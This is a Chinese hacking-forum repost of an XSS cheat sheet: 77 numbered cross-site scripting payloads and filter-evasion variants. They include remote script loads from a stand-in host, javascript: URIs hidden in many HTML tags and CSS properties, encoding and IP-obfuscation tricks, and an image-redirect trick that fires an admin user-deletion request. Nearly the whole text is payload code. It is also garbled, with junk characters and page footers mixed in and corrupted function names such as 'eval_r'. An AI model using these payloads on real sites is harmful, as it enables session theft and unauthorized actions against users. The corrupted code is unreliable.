貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。- v+ p' G7 r, _
(1)普通的XSS JavaScript注入
4 f/ U$ ]2 \2 M( ?" l, ?; s<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, [' M5 g6 ~- T( i(2)IMG标签XSS使用JavaScript命令* \2 y" X' Y6 w! [) C2 y. P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; K% f# h+ b0 p2 }, H(3)IMG标签无分号无引号
4 f5 A& R* c) I/ v. F. P3 ^: @6 `<IMG SRC=javascript:alert(‘XSS’)>$ K1 e! s% n# m6 c6 j" K
(4)IMG标签大小写不敏感* @% Z' Z2 m: B0 u' u4 H& @
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" G8 ]. o; g. z- N3 J2 w( G(5)HTML编码(必须有分号)
d+ b7 _. W! T8 z0 l2 ~% d<IMG SRC=javascript:alert(“XSS”)>, | u6 r. y( r/ y- l2 q
(6)修正缺陷IMG标签( u1 N1 u0 N5 l( n$ l, m
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>4 D/ y, x* S' t, r/ e
) `; b0 P" A, {) M+ j1 a: U
2 @$ ]/ G( C$ ^+ r. n: F(7)formCharCode标签(计算器)
$ z3 q0 s, B2 m% q8 z( y<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
0 p: V% I/ k9 s' \(8)UTF-8的Unicode编码(计算器)3 U9 s0 f: p0 Q8 `& X
<IMG SRC=jav..省略..S')>
* s, t4 I9 Z! U: c(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
& T c7 ?" D; V$ `4 e/ n4 F7 I<IMG SRC=jav..省略..S')>9 R Y g( [: O# o6 x( Y7 {7 N5 ]
(10)十六进制编码也是没有分号(计算器)- _) h$ |. u2 @5 i' \ r
<IMG SRC=java..省略..XSS')>. }; K& T/ ]% b8 f) B. b
(11)嵌入式标签,将Javascript分开
! C4 }( a: G6 N2 {5 y% p( t<IMG SRC=”jav ascript:alert(‘XSS’);”>
- ~1 L1 j2 J: G) c(12)嵌入式编码标签,将Javascript分开- C/ s0 R# ~/ t8 g5 U
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, |# R& C; R! u _4 @. d8 U. [, p4 n(13)嵌入式换行符
; H$ X' r* n. |; v3 A" O<IMG SRC=”jav ascript:alert(‘XSS’);”>
* i. h4 B/ d& O3 L4 v$ R1 S(14)嵌入式回车! I7 s7 m: C. b- O2 \8 W
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 D, n' ^5 O4 Q8 T1 X% E# Q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子; \" _4 E+ _( H0 s
<IMG SRC=”javascript:alert(‘XSS‘)”>6 L/ T5 u, O' \" x
(16)解决限制字符(要求同页面)& I+ k+ q- V* P! \; j( v* g
<script>z=’document.’</script>
/ D G# S/ o" E<script>z=z+’write(“‘</script>
: E0 C6 S9 ~1 S$ O6 K+ ~<script>z=z+’<script’</script>6 ]8 Q) ^, |8 p7 S4 T
<script>z=z+’ src=ht’</script>
6 X E; y) U5 ^4 h( S<script>z=z+’tp://ww’</script>
" E2 E- p+ A& ^* S8 x, @<script>z=z+’w.shell’</script>
h/ I) o! B3 r+ T<script>z=z+’.net/1.’</script>! ^* v5 b- ]9 h! O
<script>z=z+’js></sc’</script>. `0 q0 X" J; Q+ n6 d
<script>z=z+’ript>”)’</script>6 T2 Q- Z6 Z, |" _+ P' g' I
<script>eval_r(z)</script>
- g: Z3 M+ V' X7 q(17)空字符12-7-1 T00LS - Powered by Discuz! Board3 V7 d" V7 ?' |7 e7 x$ D
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
/ U4 B: V6 C' _, Z: @) ]2 V! Qperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out+ G3 }3 o7 B4 a9 Y7 t
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用1 i( F% _- N1 A2 S L2 R) j
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
7 F; a( N/ l! m9 r( j3 D(19)Spaces和meta前的IMG标签
+ ]: j: q$ \) y' P<IMG SRC=” javascript:alert(‘XSS’);”>
9 E0 i& ^. ?. w S2 N' X(20)Non-alpha-non-digit XSS4 I" d# @' s! g: R
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! e. k6 ?0 [/ Z. {, a(21)Non-alpha-non-digit XSS to 2
1 _) T) y' M. l. I: v( ^/ S2 g+ U<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) x: ^; F4 Q( v: ~
(22)Non-alpha-non-digit XSS to 3' ]% p: F, i4 b/ K* E5 I
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>4 n" J; d7 U! s u% {
(23)双开括号
$ p) \4 R/ V' e. P<<SCRIPT>alert(“XSS”);//<</SCRIPT>) X9 t7 }; s( r& m1 t
(24)无结束脚本标记(仅火狐等浏览器)
( p1 R- Y, G3 y; I9 s<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
) _' g; {! W. A(25)无结束脚本标记2. N- b& }* U) j
<SCRIPT SRC=//3w.org/XSS/xss.js>
9 k% T; O( D$ l$ h5 D(26)半开的HTML/JavaScript XSS2 _3 V# |# i4 Y
<IMG SRC=”javascript:alert(‘XSS’)”9 D/ a+ Z! s! d
(27)双开角括号
. q# Y2 n8 V6 r) I( ]* F<iframe src=http://3w.org/XSS.html <
: l; A" P k, a2 |" N) _$ T(28)无单引号 双引号 分号& d; m# [* A7 F" ?( S% v
<SCRIPT>a=/XSS/* E& A+ L4 W, h1 W
alert(a.source)</SCRIPT>8 q% Y9 M, x+ N" t# L0 W- A" Z
(29)换码过滤的JavaScript/ ]3 Y% N5 p! l' ?; u
\”;alert(‘XSS’);//
' p) q. n% I" I0 {+ V. ]. Z8 H(30)结束Title标签% {4 S6 J5 ]% k4 T' l5 v- }7 w: L
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>: p0 K3 L% |- |+ W$ P k
(31)Input Image1 Q6 C% |' K6 Z% @9 |
<INPUT SRC=”javascript:alert(‘XSS’);”>( z, U# w2 G% F% A9 f
(32)BODY Image
/ T' W+ `5 O; W<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- h& }; P; x" _% t; O+ h$ K(33)BODY标签: J/ ^% Z# a. `8 C# W
<BODY(‘XSS’)>( b4 S1 k8 C- {% h
(34)IMG Dynsrc
' G+ y* k) j% y2 p& v; K<IMG DYNSRC=”javascript:alert(‘XSS’)”>3 f- T- P; B9 H6 M1 H
(35)IMG Lowsrc" G' Q r2 L/ x# Z
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
4 k7 L5 k& R/ C5 ~(36)BGSOUND" l: D: V+ c- [ d
<BGSOUND SRC=”javascript:alert(‘XSS’);”>, W% q1 z+ g2 g
(37)STYLE sheet1 N9 m/ z( L8 |) x s, P
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>0 @0 J* f! Z/ J/ Y
(38)远程样式表
% U, N- H& |. p1 r7 P<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
2 W: a/ q: P% G% ` g8 m(39)List-style-image(列表式)' R) }, O1 a* I6 ] l
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS4 X1 Y% K) s' m" p7 B
(40)IMG VBscript
% I f7 B B; d, z" V% [2 Q<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
! K5 U( z$ ]( k4 Z0 [: t# l(41)META链接url7 _ t B2 o5 }4 D% `! z
/ Q" m' _/ C6 ~2 V v2 s: |
" L! y# H, D8 P9 q. P n3 J: ?
<META HTTP-EQUIV=”refresh” CONTENT=”0;4 V% g" o$ c% I" P
URL=http://;URL=javascript:alert(‘XSS’);”>) l3 K, R* [& g) D# `# O- `
(42)Iframe
& ~ G- l4 c4 s; [2 J<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
8 c" X# T2 r; }. r0 H2 [" W(43)Frame
" j; J' Q# J3 a3 x1 o<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
7 E# F/ o4 i( L5 R- e+ d2 `( b# \& _https://www.t00ls.net/viewthread ... table&tid=15267 3/6
7 c% j# E5 X% J5 T(44)Table
+ Y; Z5 W( ^ `<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
( f- R" H2 Z; J* J! @% r/ E(45)TD
: B* b4 S) J* `2 i. O$ Z1 R<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>/ z3 v# `. o h! A: G. w
(46)DIV background-image* V& @# n( v) h" y1 k
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
% F# H* }, f, m' L! M) B! ](47)DIV background-image后加上额外字符(1-32&34&39&160&8192-) Q" p/ A% a' y$ J& Y
8&13&12288&65279)
! D$ Y. F1 M# A% ~: A2 V2 X- m$ j<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>% Y* r: c% |- G% j2 p$ h
(48)DIV expression
( n' Y+ x3 S' }% j2 }* `4 `% U, O<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 F0 y2 P6 B! v5 V9 b(49)STYLE属性分拆表达
' v7 e+ l/ k& x. _- z; Q. H<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( \2 S1 d8 V+ m5 `& g
(50)匿名STYLE(组成:开角号和一个字母开头)4 c3 A+ j% S$ V
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>% t# l* p& y W2 V9 F
(51)STYLE background-image' i( z9 E4 A S- Q6 b! G+ K
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A* t* Z" o4 X' q, k% p, u
CLASS=XSS></A>
" U1 I: H; p+ j l; R( z7 Y(52)IMG STYLE方式3 y% V$ a4 g9 X" @: ~' ^2 j
exppression(alert(“XSS”))’>
% R$ h0 p0 l0 R" H(53)STYLE background
, ^8 D3 ]! x9 Q8 T5 Y7 g: h3 u<STYLE><STYLE
! a. I5 Q |/ T2 |3 o9 itype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>0 o. @1 h3 }7 E2 c" Z2 n
(54)BASE
. R; B. b" B4 V8 `<BASE HREF=”javascript:alert(‘XSS’);//”>
, r$ l; a0 C" h( r$ R' l. M(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
( h7 |8 z E" B( |7 s- m- j8 v<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
1 N% m2 l' L e6 m1 M(56)在flash中使用ActionScrpt可以混进你XSS的代码* Y5 a2 G0 j( Y2 r
a=”get”;9 _* F( q# }4 u" @! T
b=”URL(\”";
6 ~1 e. L, {& n3 d/ Oc=”javascript:”;! G' W. w" q. s3 y7 O4 b
d=”alert(‘XSS’);\”)”;
2 ]; r1 |& C* w' b3 D6 Z# Jeval_r(a+b+c+d);1 V3 U/ S7 `% o" N8 w
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
8 j6 `! `1 P( s$ d, i4 ]6 X<HTML xmlns:xss>
- M" |$ p$ h$ I$ F+ E# m3 S5 P% t<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>/ q' ?; e" N# r) z9 J' ?
<xss:xss>XSS</xss:xss>" j/ s' W7 O* ]6 `* l) d8 Y
</HTML>
; V# n2 z' a, d(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
4 T# s% @" \ m6 i9 ]+ U<SCRIPT SRC=””></SCRIPT>) J( @: t, G; z& f# N9 ^4 R
(59)IMG嵌入式命令,可执行任意命令
% h; F: y& ^8 B" M) H: j<IMG SRC=”http://www.XXX.com/a.php?a=b”>( w H- D. D$ i
(60)IMG嵌入式命令(a.jpg在同服务器): M( J$ G, X, M! K
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! m" A" J* _& u+ K
(61)绕符号过滤4 D3 t; q. m0 G- k
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ r" k5 I3 {2 P# P) d) b
(62)
/ u1 ] O6 H+ p6 v( e<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! R4 |+ l3 ~- F+ [. \8 F(63)6 N; J' c2 D5 q& Y, @, a( y1 K
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>0 v0 _( V) b% W: U
(64)# g0 q4 ?2 ]5 W- b/ l. Z* z! _
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>' |6 q( [# d* S
(65)
2 ] b" L1 Z6 |( G9 ]+ x<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
. w, q* l/ k3 `" o(66)12-7-1 T00LS - Powered by Discuz! Board
- T O4 D9 [& t$ z) `+ ]https://www.t00ls.net/viewthread ... table&tid=15267 4/6
/ R5 b5 ~/ p" e1 e4 a' b+ l<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
, J/ e; X' j8 H! h7 r+ P/ f' f3 z(67)5 D- y$ D6 |0 j+ S1 A+ O; R
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
0 M, q2 E9 ~- r! s5 A& e0 C4 }0 ]</SCRIPT>
, F' b( f) |1 @9 R( [(68)URL绕行
- r2 s% W M1 f0 R }<A HREF=”http://127.0.0.1/”>XSS</A>
( _# O& N( ?* V" V& I# U(69)URL编码* X4 ?2 _0 ^$ l* [8 T# o
<A HREF=”http://3w.org”>XSS</A>
6 A3 U) c( q7 j. D* c(70)IP十进制 d' A) K7 O8 y* j2 F' n) U
<A HREF=”http://3232235521″>XSS</A>
& H2 C' b! f& ^; x. S4 W+ K(71)IP十六进制
4 m. A7 ^4 Y+ [( ^( v& M4 q<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
2 T& L% Y- Z$ [( D1 e. s" d(72)IP八进制" Z3 ^7 ?: f% e; ?2 n6 U: }' n
<A HREF=”http://0300.0250.0000.0001″>XSS</A>7 X% R8 f: ^) w B; X# |% w
(73)混合编码
( ]! f6 c- g) v& z4 ?3 u<A HREF=”h" A: n+ M- S3 K% L
tt p://6 6.000146.0×7.147/”">XSS</A>7 J; x" n/ Q# m2 R1 W2 F5 \
(74)节省[http:]
8 w" v2 [# ]0 A4 V<A HREF=”//www.google.com/”>XSS</A>
, I) {; R4 j; N8 n. M4 f& g& e# I% a(75)节省[www]
) v) b$ P- Z: e<A HREF=”http://google.com/”>XSS</A>( l3 x1 l/ D! p$ y3 c( w
(76)绝对点绝对DNS
0 _. O* ^- ~* R0 j& w3 m. N; }' h<A HREF=”http://www.google.com./”>XSS</A>+ F, z5 s2 p* w; s( I
(77)javascript链接0 o8 t& A5 Q8 A: j
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
: i4 K: w' }: E5 u" L& c
# r) A5 |! `& t( J; ^3 t0 w原文地址:http://fuzzexp.org/u/0day/?p=14
) Y1 B/ g' }+ S8 E4 V2 s. x/ z8 J% a
|
发表于 2013-4-19 19:22:37
收藏
支持
反对